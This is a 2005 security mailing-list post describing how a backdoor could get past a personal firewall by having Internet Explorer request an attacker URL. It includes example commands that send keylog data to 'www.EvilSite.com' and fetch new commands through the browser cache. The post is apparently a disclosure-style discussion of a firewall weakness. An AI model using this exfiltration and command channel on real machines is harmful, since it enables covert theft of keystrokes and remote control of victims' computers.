Date: Mon Oct  3 19:26:42 2005
From: gautam.bipin at gmail.com (Bipin Gautam)
Subject: Bypassing Personal Firewall, is it that* hard?

hello list,
Lately 'Debasis Mohanty' was refreshing some old issues. Anyways... is
Bypassing Personal Firewall & let an internal (evil) application
communicate with the external world,  the hard. I mean... OK try
this........ Lets.. me give you a simple concept. I'll call it
'passive communication' ( in lack of better world)

say... a backdoor want to communicate to its server... It can do
is,.... use a trusted internal application to do the job. Suppose; it
creates a batch file run the batch file  (evil.bat) & executes this
command

....Internet Explorer\> iexplore.exe www.EvilSite.com/?cmd=submit&f=___KeyLog__

the batch file will get executed & Internet explorer will happily send
the DATA. This trick can be used to send OUTPUT as well as get
input... without trigering the firewall.

To get input; the backdoor can do is... say, run similar BAT script:

....Internet Explorer\> iexplore.exe www.EvilSite.com/?cmd=ANY_NEW_COMMANDS

well... the history of the page
www.EvilSite.com/?cmd=ANY_NEW_COMMANDS will be there in the IE
cache... Then the backdoor can do is... RUN a string based 'GREP' in
the IE cache & see if there is any new job to acomplish.

just a rough theory... but ya its POSSIBLE; to let a internal backdoor
have I/O with its server without trigering the firewall alert....

yap it does work... using the same trick can't the backdoor happily
communicate with its server using the trick

--

Bipin Gautam

Zeroth law of security: The possibility of poking a system from lower
privilege is zero unless & until there is possibility of direct,
indirect or consequential communication between the two...